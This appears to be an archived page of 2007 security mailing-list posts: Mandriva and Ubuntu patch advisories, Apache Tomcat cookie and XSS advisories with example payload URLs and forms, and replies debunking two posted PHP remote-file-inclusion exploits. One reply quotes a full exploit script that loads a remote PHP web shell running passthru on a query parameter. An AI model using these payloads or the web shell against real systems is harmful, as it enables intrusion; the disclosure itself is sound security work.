[ MDKSA-2007:159 ] - Updated gpdf packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:159 http://www.mandriva.com/security/ ___ Package : gpdf Date: August 13, 2007 Affected: Corporate 3.0 ___ Problem Description: Maurycy Prodeus found an integer overflow vulnerability in the way various PDF viewers processed PDF files. An attacker could create a malicious PDF file that could cause gpdf to crash and possibly execute arbitrary code open a user opening the file. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 ___ Updated Packages: Corporate 3.0: 4cd42c64b35c4eccdcb85de2a0889876 corporate/3.0/i586/gpdf-0.112-2.8.C30mdk.i586.rpm 5eaf44a638c77c2b6b9f99c81a8bd00a corporate/3.0/SRPMS/gpdf-0.112-2.8.C30mdk.src.rpm Corporate 3.0/X86_64: a994aae5759655c0b8dffa064c5f83a8 corporate/3.0/x86_64/gpdf-0.112-2.8.C30mdk.x86_64.rpm 5eaf44a638c77c2b6b9f99c81a8bd00a corporate/3.0/SRPMS/gpdf-0.112-2.8.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGwM1tmqjQ0CJFipgRAolJAKC/iV/5iLoYDqPdKiC0GLwIimv12gCeKNeQ eWAqWhjy8op4OcX/HcXsVLc= =D53g -END PGP SIGNATURE-
PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Exploit is attached. E. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwRXDmErIuzAYjw8RApkJAKCkxFrH2XmwTS37D0B8BmaFe47EkwCgs5Uc 6XtVfkHyqOVv51uylzwT3WQ= =49Nv -END PGP SIGNATURE- egs-fuckphpbluedragon300.pl Description: Perl program
Re: PHPCentral Login Script Remote Command Execution Vulnerability
On Sunday 12 August 2007 17:12, [EMAIL PROTECTED] wrote: include.php ; Lines 4 ; include(.$_SERVER[DOCUMENT_ROOT]./$folder/config.php); PoC : http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?; cmd=id *Of course* this does not work. Setting register_globals to On causes the contents of the superglobals ($_SERVER, $_GET, $_COOKIES, etc.) to be registered in the global variable namespace. But the superglobals *themselves* are special. They shadow everything - you cannot define your own $_SERVER array, nor can it be overridden with HTTP GET or POST values. If that were possible, using the superglobals would be useless; all scripts would be vulnerable unless register_globals is off. PoC: echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER[DOCUMENT_ROOT], br/; echo '$_GET[_SERVER][DOCUMENT_ROOT] = ', $_GET[_SERVER] [DOCUMENT_ROOT], br/; Outputs: $_SERVER[DOCUMENT_ROOT] = /home/www/docs $_GET[_SERVER][DOCUMENT_ROOT] = /foo If the query string is _SERVER[DOCUMENT_ROOT]=/foo = Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it would be fair to let PHP scripts rely on this, and not consider all scripts that don't initialize their variables as vulnerable unless they require register_globals to be on (this is not to say that it's not a good idea to initialize variables). And it would of course be nice if people posting to Bugtraq actually tested their PoCs first. Can't the moderator spot obvious cases like this, or are all vaguely relevant posts accepted, potentially for public ridicule? -- Magnus Holmgren[EMAIL PROTECTED] pgpUgxoNxl6Zw.pgp Description: PGP signature
[ MDKSA-2007:161 ] - Updated poppler packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:161 http://www.mandriva.com/security/ ___ Package : poppler Date: August 13, 2007 Affected: 2007.0, 2007.1, Corporate 4.0 ___ Problem Description: Maurycy Prodeus found an integer overflow vulnerability in the way various PDF viewers processed PDF files. An attacker could create a malicious PDF file that could cause poppler to crash and possibly execute arbitrary code open a user opening the file. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 ___ Updated Packages: Mandriva Linux 2007.0: ff1a936825b13adf6e0d244d0128efa4 2007.0/i586/libpoppler-qt1-0.5.3-5.3mdv2007.0.i586.rpm 9d28c724d9e3913761fa1d0528cb7cb8 2007.0/i586/libpoppler-qt1-devel-0.5.3-5.3mdv2007.0.i586.rpm fa4b5cf01b38c572d741ef08fe04b293 2007.0/i586/libpoppler-qt4-1-0.5.3-5.3mdv2007.0.i586.rpm e35a3598cbc0f29c4c21e675e6391ff3 2007.0/i586/libpoppler-qt4-1-devel-0.5.3-5.3mdv2007.0.i586.rpm 1702a9c16e72fe89f9aa1b78ff6055b5 2007.0/i586/libpoppler1-0.5.3-5.3mdv2007.0.i586.rpm 0f1f330e28674ce2e67e56f3614b4d2c 2007.0/i586/libpoppler1-devel-0.5.3-5.3mdv2007.0.i586.rpm b619db3ef9b9545adf9f864f2972db97 2007.0/i586/poppler-0.5.3-5.3mdv2007.0.i586.rpm 9a311578c1933c8ec6ddb2f8b4e93445 2007.0/SRPMS/poppler-0.5.3-5.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c8b111069fa66ce0682dacf1e3de01f9 2007.0/x86_64/lib64poppler-qt1-0.5.3-5.3mdv2007.0.x86_64.rpm 7434c137fd66482914aa6996f1aae55c 2007.0/x86_64/lib64poppler-qt1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm 1b01f4d5f77ce2f08f09ca942c409b60 2007.0/x86_64/lib64poppler-qt4-1-0.5.3-5.3mdv2007.0.x86_64.rpm cbc85b288f7e0e35a3c97c0e3731e6ef 2007.0/x86_64/lib64poppler-qt4-1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm db95938d3c09131729b80a7283d359c9 2007.0/x86_64/lib64poppler1-0.5.3-5.3mdv2007.0.x86_64.rpm ccc128242680e5f90fb49026b83daa04 2007.0/x86_64/lib64poppler1-devel-0.5.3-5.3mdv2007.0.x86_64.rpm 714996d0cc629e62649360749a9050f0 2007.0/x86_64/poppler-0.5.3-5.3mdv2007.0.x86_64.rpm 9a311578c1933c8ec6ddb2f8b4e93445 2007.0/SRPMS/poppler-0.5.3-5.3mdv2007.0.src.rpm Mandriva Linux 2007.1: 2ef41e36faff21f62fbec2bf89e7b6f1 2007.1/i586/libpoppler-qt1-0.5.4-3.2mdv2007.1.i586.rpm 377e85d2c599a82f3871f138494f322c 2007.1/i586/libpoppler-qt1-devel-0.5.4-3.2mdv2007.1.i586.rpm a3219588e17b2cc3189e5395ec5dd475 2007.1/i586/libpoppler-qt4-1-0.5.4-3.2mdv2007.1.i586.rpm 81344c8e3eb0437559e3e5c0eac62631 2007.1/i586/libpoppler-qt4-1-devel-0.5.4-3.2mdv2007.1.i586.rpm b78ab182aac571c2a99fae0a5d470927 2007.1/i586/libpoppler1-0.5.4-3.2mdv2007.1.i586.rpm 87893636c37eb5db131127f89695df0f 2007.1/i586/libpoppler1-devel-0.5.4-3.2mdv2007.1.i586.rpm 6ff7146293ee8aec15574d4aa89d6a2f 2007.1/i586/poppler-0.5.4-3.2mdv2007.1.i586.rpm 87111ab66842ea16932e76614932f024 2007.1/SRPMS/poppler-0.5.4-3.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 6739512a718b2ba794d33c567703f9ad 2007.1/x86_64/lib64poppler-qt1-0.5.4-3.2mdv2007.1.x86_64.rpm 37b8f40a836b910455ed43a252303dc7 2007.1/x86_64/lib64poppler-qt1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm 747be5e90c821630dd349ba16ef698b4 2007.1/x86_64/lib64poppler-qt4-1-0.5.4-3.2mdv2007.1.x86_64.rpm 153745ad2a655b8e1262c82ae1fc70a4 2007.1/x86_64/lib64poppler-qt4-1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm b59db62be7a4d73a8f0de227da0d5354 2007.1/x86_64/lib64poppler1-0.5.4-3.2mdv2007.1.x86_64.rpm 47541453858a863a482a316cf14d56b6 2007.1/x86_64/lib64poppler1-devel-0.5.4-3.2mdv2007.1.x86_64.rpm 9ac6efa64431cf7144e77375ba90769b 2007.1/x86_64/poppler-0.5.4-3.2mdv2007.1.x86_64.rpm 87111ab66842ea16932e76614932f024 2007.1/SRPMS/poppler-0.5.4-3.2mdv2007.1.src.rpm Corporate 4.0: f8b99d883919ba20e7f46aa71448edb5 corporate/4.0/i586/libpoppler-qt0-0.4.1-3.5.20060mlcs4.i586.rpm 89e37529b304258acd4999c5fbfadec7 corporate/4.0/i586/libpoppler-qt0-devel-0.4.1-3.5.20060mlcs4.i586.rpm 97b9de6aa6c6617c21b7e9bbea3a517b corporate/4.0/i586/libpoppler0-0.4.1-3.5.20060mlcs4.i586.rpm 94232bb5dad116fdd2a4b342c7205eb3 corporate/4.0/i586/libpoppler0-devel-0.4.1-3.5.20060mlcs4.i586.rpm 45ba9d12e59c1cbb4aae41988d5983c3 corporate/4.0/SRPMS/poppler-0.4.1-3.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 4ee1af44c82311a075abd9bec021935c corporate/4.0/x86_64/lib64poppler-qt0-0.4.1-3.5.20060mlcs4.x86_64.rpm 53fbebb09587d1949951ad4a9d6a9eab corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1-3.5.20060mlcs4.x86_64.rpm 2153b37ce8cd3a29bbf6d31a68a50558
[ MDKSA-2007:160 ] - Updated pdftohtml packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:160 http://www.mandriva.com/security/ ___ Package : pdftohtml Date: August 13, 2007 Affected: 2007.0, 2007.1 ___ Problem Description: Maurycy Prodeus found an integer overflow vulnerability in the way various PDF viewers processed PDF files. An attacker could create a malicious PDF file that could cause pdftohtml to crash and possibly execute arbitrary code open a user opening the file. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 ___ Updated Packages: Mandriva Linux 2007.0: 4592a1f7115b10ad63444f4573a30365 2007.0/i586/pdftohtml-0.36-5.2mdv2007.0.i586.rpm ed0f9331d0f7042c9ef0df41d28c1e69 2007.0/SRPMS/pdftohtml-0.36-5.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 686d03f528d949957ff5884bb505d762 2007.0/x86_64/pdftohtml-0.36-5.2mdv2007.0.x86_64.rpm ed0f9331d0f7042c9ef0df41d28c1e69 2007.0/SRPMS/pdftohtml-0.36-5.2mdv2007.0.src.rpm Mandriva Linux 2007.1: 66426070761def5ae0ee9f6f1b174a46 2007.1/i586/pdftohtml-0.39-1.1mdv2007.1.i586.rpm 17a547b0f2d2fecc5800083143dc730f 2007.1/SRPMS/pdftohtml-0.39-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 2d572fa290a490bbcaff73898c95a2af 2007.1/x86_64/pdftohtml-0.39-1.1mdv2007.1.x86_64.rpm 17a547b0f2d2fecc5800083143dc730f 2007.1/SRPMS/pdftohtml-0.39-1.1mdv2007.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGwNFrmqjQ0CJFipgRAv2IAKDb0IHMGzNZATBqmDVKH6QoVioH7ACfX46t fDzt568B5Q6htUhoJ1ihjdo= =acIA -END PGP SIGNATURE-
CVE-2007-3382: Handling of cookies containing a ' character
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2007-3382: Handling of cookies containing a ' character
Severity:
Low (Session Hi-jacking)
Vendor:
The Apache Software Foundation
Versions Affected:
6.0.0 to 6.0.13
5.5.0 to 5.5.24
5.0.0 to 5.0.30
4.1.0 to 4.1.36
3.3 to 3.3.2
Description:
Tomcat incorrectly treats a single quote character (') in a cookie
value as a delimiter. In some circumstances this can lead to the
leaking of information such as session ID to an attacker.
Mitigation:
Upgrade to 6.0.14
Credit:
This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing
and Networking Center, who worked with the CERT/CC to report the
vulnerability.
Example:
http://localost:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKERcookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B
References:
http://tomcat.apache.org/security.html
Mark Thomas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFGwSFVb7IeiTPGAkMRAjkwAKDnu+C08WRZazmZfzunFeHcitsvnACg3CtP
6c6FCxbFOcfxhqqayg8kdUI=
=MkDj
-END PGP SIGNATURE-
[ MDKSA-2007:158 ] - Updated xpdf packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:158 http://www.mandriva.com/security/ ___ Package : xpdf Date: August 13, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: Maurycy Prodeus found an integer overflow vulnerability in the way various PDF viewers processed PDF files. An attacker could create a malicious PDF file that could cause xpdf to crash and possibly execute arbitrary code open a user opening the file. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387 ___ Updated Packages: Mandriva Linux 2007.0: 269758a101a0b173a5cf5d77969b84e4 2007.0/i586/xpdf-3.01pl2-3.2mdv2007.0.i586.rpm f716a25908b7c51f83fc6ed2e6c430e5 2007.0/i586/xpdf-tools-3.01pl2-3.2mdv2007.0.i586.rpm a7ec337f6981c4e7f7397cff5172d6f7 2007.0/SRPMS/xpdf-3.01pl2-3.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b79a710e2f13d81dc23be17ea24373d7 2007.0/x86_64/xpdf-3.01pl2-3.2mdv2007.0.x86_64.rpm 3b0bf52479044b0f90bef43c9a47d916 2007.0/x86_64/xpdf-tools-3.01pl2-3.2mdv2007.0.x86_64.rpm a7ec337f6981c4e7f7397cff5172d6f7 2007.0/SRPMS/xpdf-3.01pl2-3.2mdv2007.0.src.rpm Mandriva Linux 2007.1: e6d43c42af665f665a053e879382d487 2007.1/i586/xpdf-3.02-1.2mdv2007.1.i586.rpm 801976970dbb5dc4bbe5383e285a5a47 2007.1/i586/xpdf-tools-3.02-1.2mdv2007.1.i586.rpm 1ffa2c61b74cff6dc6d63d1b639e3a7d 2007.1/SRPMS/xpdf-3.02-1.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: b7232e0c216fab5c3cf0d79e6fe8556f 2007.1/x86_64/xpdf-3.02-1.2mdv2007.1.x86_64.rpm ccb70220cf4155dbe199e7740c1a706a 2007.1/x86_64/xpdf-tools-3.02-1.2mdv2007.1.x86_64.rpm 1ffa2c61b74cff6dc6d63d1b639e3a7d 2007.1/SRPMS/xpdf-3.02-1.2mdv2007.1.src.rpm Corporate 3.0: fd898bc3b8e3ad116afdbe2830151e78 corporate/3.0/i586/xpdf-3.00-5.10.C30mdk.i586.rpm 19c11694c9485188559e4d53780e89bf corporate/3.0/SRPMS/xpdf-3.00-5.10.C30mdk.src.rpm Corporate 3.0/X86_64: 4836903f1fcc94dc36b726d54e81a5df corporate/3.0/x86_64/xpdf-3.00-5.10.C30mdk.x86_64.rpm 19c11694c9485188559e4d53780e89bf corporate/3.0/SRPMS/xpdf-3.00-5.10.C30mdk.src.rpm Corporate 4.0: 2cfc84f609c24cbca54f5d7209c0afb1 corporate/4.0/i586/xpdf-3.01-1.4.20060mlcs4.i586.rpm 95fd53a24bf1c773dc3925a68b51e01b corporate/4.0/SRPMS/xpdf-3.01-1.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: b88cfde5131adf97fc654b8772fb638b corporate/4.0/x86_64/xpdf-3.01-1.4.20060mlcs4.x86_64.rpm 95fd53a24bf1c773dc3925a68b51e01b corporate/4.0/SRPMS/xpdf-3.01-1.4.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGwM0emqjQ0CJFipgRAu3vAKDmsiefFpqDx6azTsk+bf6bjpIEEQCeIaMz WGhfTpiOik4jsvYLU0N5Xxo= =yMmF -END PGP SIGNATURE-
CVE-2007-3385: Handling of \ in cookies
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2007-3385: Handling of \ in cookies Severity: Low (Session Hi-jacking) Vendor: The Apache Software Foundation Versions Affected: 6.0.0 to 6.0.13 5.5.0 to 5.5.24 5.0.0 to 5.0.30 4.1.0 to 4.1.36 3.3 to 3.3.2 Description: Tomcat incorrectly handles the character sequence \ in a cookie value. In some circumstances this can lead to the leaking of information such as session ID to an attacker. Mitigation: Upgrade to 6.0.14 Credit: This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing and Networking Center, who worked with the CERT/CC to report the vulnerability. Example: http://localhost:8080/examples/servlets/servlet/CookieExample?cookiename=HAHAcookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B References: http://tomcat.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwSFlb7IeiTPGAkMRArdPAJ99AXYzSterU7oG+u8UrtQAd2lTZwCbBK2R hwRixKaYOwWyj5kD+fLT1ls= =hgTP -END PGP SIGNATURE-
CVE-2007-3386: XSS in Host Manager
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CVE-2007-3386: XSS in Host Manager Severity: Low (Cross-site scripting) Vendor: The Apache Software Foundation Versions Affected: 6.0.0 to 6.0.13 5.5.0 to 5.5.24 Description: The Host Manager Servlet does not filter user supplied data before display. This enables an XSS attack. Mitigation: Log out (close browser) of the Host Manager application once admin tasks are complete Upgrade to 6.0.14 Credit: This issue was discovered by the NTT OSS CENTER who worked with the JPCERT/CC to report the vulnerability. Example: form action=http://localhost:8080/host-manager/html/add; method=get input type=hidden NAME='name' VALUE=aaa input type=hidden NAME='aliases' VALUE=scriptalert()/script input type=submit /form References: http://tomcat.apache.org/security.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGwSFyb7IeiTPGAkMRAlgMAKCe0hS+c6so9pxK3KfN7LggWv+3uQCfUsAg 95+vMfHDJlrKHP/yKUZ0SYc= =1pQc -END PGP SIGNATURE-
[USN-497-1] xfce4-terminal vulnerability
=== Ubuntu Security Notice USN-497-1August 14, 2007 xfce4-terminal vulnerability CVE-2007-3770 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: xfce4-terminal 0.2.5+r21674-0ubuntu2.1 Ubuntu 6.10: xfce4-terminal 0.2.5.4-0ubuntu2.1 Ubuntu 7.04: xfce4-terminal 0.2.6-0ubuntu3.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: Lasse Kärkkäinen discovered that the Xfce Terminal did not correctly escape shell meta-characters during Open Link actions. If a remote attacker tricked a user into opening a specially crafted URI, they could execute arbitrary commands with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1.diff.gz Size/MD5: 7892 902a748e0c0fe963aed9f62d7492247c http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1.dsc Size/MD5: 982 7ab2af378e2db311101541887b3d899f http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674.orig.tar.gz Size/MD5: 1719502 202f3d5364127ee2cd3434e7fecad5d2 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_amd64.deb Size/MD5: 1005574 5b196f5dc586000452233f215248423b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_i386.deb Size/MD5: 998716 7476e02c550b2876da957249e126ba91 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_powerpc.deb Size/MD5: 1002380 eec3f73feb99b58aaef302ffa0cf24b8 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5+r21674-0ubuntu2.1_sparc.deb Size/MD5: 1000628 822e33229ad34eb7703051a8ea3eab88 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1.diff.gz Size/MD5: 7764 6759a5320fc94d1c95d2fd68dbbf974d http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1.dsc Size/MD5: 967 5556541b5e806d77a068018609d97674 http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4.orig.tar.gz Size/MD5: 1914192 858ff414d46c2bdd695da3874ef01090 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_amd64.deb Size/MD5: 1010080 607dc6c46565dac2cfa378134e5d91e2 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_i386.deb Size/MD5: 1004880 343ed30f5a69e7caeb081269c7300b31 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_powerpc.deb Size/MD5: 1006248 2c3e3ff2ceb6711f055b4e1af3c28607 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.5.4-0ubuntu2.1_sparc.deb Size/MD5: 1004086 b7744640ce68f8f8d8763dee3414ffb8 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1.diff.gz Size/MD5: 8617 2ed6e7705918937831599b2c3d366777 http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1.dsc Size/MD5: 1043 435a5294f568d44abbd907bec892e50e http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6.orig.tar.gz Size/MD5: 1989139 c93cc68cc7656dfcb57118a999b79242 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1_amd64.deb Size/MD5: 1014248 8af1dd3b37a96344c3a892de94745867 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xfce4-terminal/xfce4-terminal_0.2.6-0ubuntu3.1_i386.deb Size/MD5: 1008944 a3e14fefeecbc2b3128652b809c5a27a powerpc architecture
Re: phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit
FAKE!! i think that this guy just take some exploits on the web and
modify them a little then re-post them..
index.php, first 2 lines:
?
$dvd_config_file = config.php; // Full path and name of the config file
so, where is the RFI?
but is obvious that you do not understand anything of this, let's take
a look at your exploit:
$packet =GET .$p.index.php?dvd_config_file=.$shell.?cmd=.$cmd.%00
HTTP/1.0\r\n;
i do not think that:
1 - will work with 2 '?' in the url
2 - you now why rgod or some one else putted %00 at the end of the
url..
hope to never see you nick again
Saturday, August 11, 2007, 5:04:36 PM, you wrote:
#!/usr/bin/php -q -d short_open_tag=on
?
print '
//'===
//'[Script : phpDVD v1.0.4
//'[Author : iLker Kandemir ilkerkandemir[at]mynet.com
//'[S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz
//'[Dork: phpDVD v1.0.4
//'===
//'[[Code]]--
//'
//' require($dvd_config_file);
//'
//'[[Code]]-
';
if ($argc4) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell cmd OPTIONS
host: script server (ip/hostname)
shell: path to shell
cmd: a shell command (ls -la)
Options:
-p[port]:specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: ?php ob_clean();echoiLker Kandemir
www.mefistolabs.com;ini_set(max_execution_time,0);echo
mefistolabs;passthru($_GET[cmd]);die;?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
error_reporting(0);
ini_set(max_execution_time,0);
ini_set(default_socket_timeout,5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i=strlen($string)-1; $i++)
{
if ((ord($string[$i]) = 32 ) | (ord($string[$i]) 126 ))
{$result.= .;}
else
{$result.= .$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.= .dechex(ord($string[$i]));}
else
{$exa.= 0.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=\r\n; $exa.=\r\n;}
}
return $exa.\r\n.$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo Connecting to .$parts[0].:.$parts[1]. proxy...\r\n;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo \r\n.$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 10);
}
$host=$argv[1];
$shell=$argv[2];
$cmd=;
$port=80;
$proxy=;
for ($i=3; $i$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp-p) and ($temp-P)) {$cmd.= .$argv[$i];}
if ($temp==-p)
{
$port=str_replace(-p,,$argv[$i]);
}
if ($temp==-P)
{
$proxy=str_replace(-P,,$argv[$i]);
}
}
if ($proxy=='') {$p='http://'.$host.':'.$port;}
$packet =GET
.$p.index.php?dvd_config_file=.$shell.?cmd=.$cmd.%00 HTTP/1.0\r\n;
$packet.=Host: .$host.\r\n;
$packet.=Connection: Close\r\n\r\n;
sendpackets($packet);
if (strstr($html,mefistolabs))
{
$temp=explode(mefistolabs,$html);
die($temp[1]);
}
echo Exploit ERROR;
echo www.mefistolabs.com;
?
# MefistoLabs.Com
--
Best regards,
BlackHawkmailto:[EMAIL PROTECTED]
DeskPRO Admin Panel Multiple HTML Injections
